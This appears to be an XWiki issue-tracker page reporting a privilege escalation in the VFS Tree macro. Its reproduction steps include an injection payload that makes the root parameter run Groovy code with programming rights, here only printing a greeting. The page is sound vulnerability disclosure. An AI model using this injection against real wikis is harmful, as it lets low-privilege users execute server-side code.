Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20260

Privilege escalation (PR) from account/view through VFS Tree macro

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:

      Add

      {{vfsTree root="~" /~}~} {{cache id=~"vfs-macro-content~"~}~}{{groovy~}~}println(~"Hello from Groovy!~"){{/groovy~}~}{{/cache~}~}"/}}

      to any place where you can use wiki syntax like the "about" section in your user profile as a user without programming or script rights.

      Expected result:

      An empty VFS Tree or some error is displayed.

      Actual result:

      The output

      The [tree] macro is a standalone macro and it cannot be used inline. Click on this message for details.
      Hello from Groovy!" reference="path:/xwiki/bin/get/XWiki/username?sheet=Macros.VFSTreeJSON&outputSyntax=plain" links="true"/}}
      

      is displayed. This shows that the Groovy macro has been executed and thus programming rights have been gained. This is because the VFS Tree macro allows XWiki syntax injection through the root parameter.

      Note that the VFS Tree macro, while being part of xwiki-platform, is not bundled with XWiki and thus this issue cannot be exploited on a default installation of XWiki.

      Attachments

        Issue Links

          Activity

            People

              mleduc Manuel Leduc
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: